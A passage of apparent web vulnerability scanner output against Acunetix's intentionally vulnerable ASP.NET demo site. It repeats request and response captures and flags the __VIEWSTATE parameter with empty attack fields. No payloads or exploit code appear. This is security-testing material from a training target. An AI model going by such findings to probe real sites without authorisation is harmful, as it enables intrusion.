Request Body - size: 1,175 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8387&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIBxzorg2ghkZGRR5O9EX4EJYk0BPVqOtpsSiQ8dwQ%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLZ1rwQAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAER7Alf7A1H2XWz0%2BmUbGBvpG3Tbo%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:39:18 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIBxzorg2ghkZGRR5O9EX4EJYk0BPVqOtpsSiQ8dwQ==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLZ1rwQAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAER7Alf7A1H2XWz0+mUbGBvpG3Tbo=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:White" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1061 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,061 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8383&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDKJGbd2ghkZGTBwxaikGSOP11z7sBqcWSmlqVUzg%3D%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwL8uIX0CwL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBA9FKfzJ6qDxxsA6b%2Fj17ociBIo9
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:39 GMT Content-Length: 12607
Response Body - size: 12,607 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgIeAlNEFgEGAIDKJGbd2ghkZGTBwxaikGSOP11z7sBqcWSmlqVUzg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwL8uIX0CwL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBA9FKfzJ6qDxxsA6b/j17ociBIo9" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="color:White;background-color:Silver;border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:White" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1067 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
